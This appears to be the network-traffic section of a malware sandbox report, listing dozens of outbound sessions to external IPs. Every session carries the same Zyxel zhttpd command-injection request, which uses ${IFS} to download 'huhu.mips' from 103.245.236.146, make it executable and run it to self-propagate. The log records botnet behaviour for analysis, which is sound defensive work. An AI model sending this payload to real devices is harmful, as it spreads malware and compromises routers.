                                      Jan 19, 2024 17:29:27.682851076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3342192.168.2.1438226153.72.71.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.682878971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3343192.168.2.1449314162.72.35.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.682930946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3344192.168.2.143489637.54.1.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.682960987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3345192.168.2.1450584193.14.114.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.683001041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3346192.168.2.144072459.178.68.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.683044910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3347192.168.2.144009637.255.44.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.683095932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3348192.168.2.1460670217.184.163.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.683146000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3349192.168.2.1432884115.204.21.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.683187008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3350192.168.2.145306073.174.205.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.683228016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3351192.168.2.1434424171.119.22.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.683269024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3352192.168.2.1441122139.150.41.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.683320045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3353192.168.2.143672012.59.109.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.683340073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3354192.168.2.1457256155.253.52.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.683366060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3355192.168.2.144278464.189.225.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.683403015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3356192.168.2.1445756218.244.116.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.683461905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3357192.168.2.1434794144.75.155.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.683495045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3358192.168.2.1433934194.43.62.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.683521986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3359192.168.2.1448782106.249.69.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.683552980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3360192.168.2.1458828218.182.60.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.683612108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3361192.168.2.14354762.50.23.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.683660030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3362192.168.2.1436006205.111.171.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.683696985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3363192.168.2.1447024197.185.98.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.683725119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3364192.168.2.146060237.211.168.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.683774948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3365192.168.2.1455572150.89.165.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.683825016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3366192.168.2.143331225.137.230.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.683852911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3367192.168.2.1440122201.83.84.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.683886051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3368192.168.2.1455628223.13.221.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.683927059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3369192.168.2.144052613.182.176.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.683975935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3370192.168.2.1458400128.118.126.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.683999062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3371192.168.2.145025854.110.120.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.684050083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3372192.168.2.1455866205.198.6.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.684077024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3373192.168.2.1453640177.103.78.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.684124947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3374192.168.2.145848647.217.66.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.684161901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3375192.168.2.1438830117.201.237.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.684187889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3376192.168.2.1448478136.129.119.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.684215069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3377192.168.2.1458896223.63.119.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.684278011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3378192.168.2.145930890.205.162.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.684302092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3379192.168.2.1446110217.142.112.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.684356928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3380192.168.2.1452198139.161.70.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.684412003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3381192.168.2.144074245.137.82.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.684433937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3382192.168.2.1451892169.82.64.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.684470892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3383192.168.2.1439224193.235.177.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.684509039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3384192.168.2.1446420158.23.143.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.684556007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3385192.168.2.1443316120.238.22.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.684585094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3386192.168.2.143640267.57.182.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.684627056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3387192.168.2.1452178118.192.145.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.684664965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3388192.168.2.1435144188.170.64.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.684689999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3389192.168.2.1445252171.179.16.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.684720993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3390192.168.2.143456891.140.170.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.684777021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3391192.168.2.1450460116.8.181.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.684819937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3392192.168.2.143437495.90.224.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.684848070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3393192.168.2.145178866.26.170.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.684880018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3394192.168.2.1455498190.221.30.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.684928894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3395192.168.2.145719291.47.184.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.684988022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3396192.168.2.143914063.238.86.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.685008049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3397192.168.2.1450422220.11.245.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.685049057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3398192.168.2.1441136111.239.218.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.685090065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3399192.168.2.1449098190.197.212.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.685127974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3400192.168.2.1439600187.125.31.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.685163021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3401192.168.2.1460704177.28.104.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.685194016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3402192.168.2.145086235.163.5.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.685204029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3403192.168.2.14579589.156.126.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.685250044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3404192.168.2.145051696.15.161.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.685285091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3405192.168.2.1453984164.120.11.77443
                                      TimestampBytes transferredDirectionData
